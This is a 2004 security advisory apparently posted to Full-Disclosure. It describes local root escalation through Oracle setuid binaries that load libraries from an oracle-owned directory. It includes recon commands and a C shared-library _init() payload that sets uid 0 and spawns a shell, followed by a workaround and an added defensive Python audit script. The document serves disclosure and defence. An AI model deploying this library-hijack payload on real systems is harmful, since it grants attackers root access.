
| Subject: | [Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform) |
|---|---|
| Date: | Fri, 30 Jul 2004 11:28:39 +0200 |
*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========---------- *
*INTRODUCTION:*
*PROBLEM SUMMARY:*
The following software versions:
- Oracle 8i Linux Platform
- Oracle 9i Linux Platform
- Oracle 8i HP-UX Platform
- Oracle 9i Solaris Platform
- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3

All versions tested on Unix platforms (universal?) are susceptible to privilege elevation from the Oracle software owner (normally oracle, ias, iasr2) to root.
*DESCRIPTION*
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
As you can see, the lib directory is owned by iasr2. Let's look for some setuid binaries:
[pask@dimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo
Now let's look at the shared objects that these binaries depend on.
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
libkstat.so.1 => /usr/lib/libkstat.so.1
....
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
libnsl.so.1 => /usr/lib/libnsl.so.1
libsocket.so.1 => /usr/lib/libsocket.so.1
libgen.so.1 => /usr/lib/libgen.so.1
.....
Oops, it's not possible to achieve root privileges with this binary in this way.
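It is easy for the iasr2 user to create a shared library, something like:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* _init() runs when the dynamic linker loads the shared object */
void _init(void) {
    printf("en el _init()\n");
    printf("Con PID=%i y EUID=%i", getpid(), geteuid());
    setuid(0);
    system("/usr/bin/ksh");
    printf("Saliendo del Init()\n");
}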
*EXPLOIT*
Described above.
*WORKAROUND*
chown the lib directory and its parent directory to root.
*STATUS*
Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that only trusted users should have access to the local iasdb user account". I have no information about a patch or a solution from Oracle Corp.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba
jmpascual@open3s.com
Barcelona - Denia - Spain
http://www.open3s.com
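
An added example, not part of the original advisory: a Python audit for the condition described in the message and for its workaround. It reads `ldd` output and reports every library whose file or any parent directory is not owned by root or is group/world-writable. The sample `ldd` lines, the uid 1001 for iasr2 and all function names are constructed for illustration.

```python
import os
import re
import stat
import sys
from types import SimpleNamespace

# Constructed sample in the ldd format quoted in the advisory.
SAMPLE_LDD = """\
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
"""
# Constructed ownership model: uid 1001 is an assumed uid for iasr2; every
# path not listed here is treated as root-owned with mode 0755.
LIB = "/export/home/iasr2/ora9ias_mid/lib"
NON_ROOT = {LIB: 1001, LIB + "/libvppdc.so": 1001, LIB + "/libwtc9.so": 1001}

def sample_stat(path):
    return SimpleNamespace(st_uid=NON_ROOT.get(path, 0), st_mode=0o755)

def parse_ldd(text):
    """Resolved library paths from ldd lines of the form 'name => /path'."""
    return [os.path.normpath(m.group(1))
            for m in re.finditer(r"=>\s*(/\S+)", text)]

def untrusted_components(path, stat_fn=os.stat):
    """Path components (the file and every parent directory) a non-root user
    controls: not owned by uid 0, or group/world-writable (conservative)."""
    found, cur = [], path
    while True:
        st = stat_fn(cur)
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            found.append(cur)
        if cur == os.path.dirname(cur):   # reached "/"
            return found
        cur = os.path.dirname(cur)

def audit(ldd_text, stat_fn=os.stat):
    """Map each library to its untrusted components; {} means nothing found."""
    found = {lib: untrusted_components(lib, stat_fn) for lib in parse_ldd(ldd_text)}
    return {lib: bad for lib, bad in found.items() if bad}

if __name__ == "__main__":
    # "ldd BINARY | python3 this_file.py -" audits this host with os.stat;
    # with no argument the constructed sample is used.
    live = sys.argv[1:] == ["-"]
    result = audit(sys.stdin.read()) if live else audit(SAMPLE_LDD, sample_stat)
    for lib, bad in result.items():
        print(lib, "<-", ", ".join(bad))
```

Run it against the `ldd` output of each setuid binary that `find` reports; an empty result after applying the workaround means no library on the load path is controlled by a non-root account.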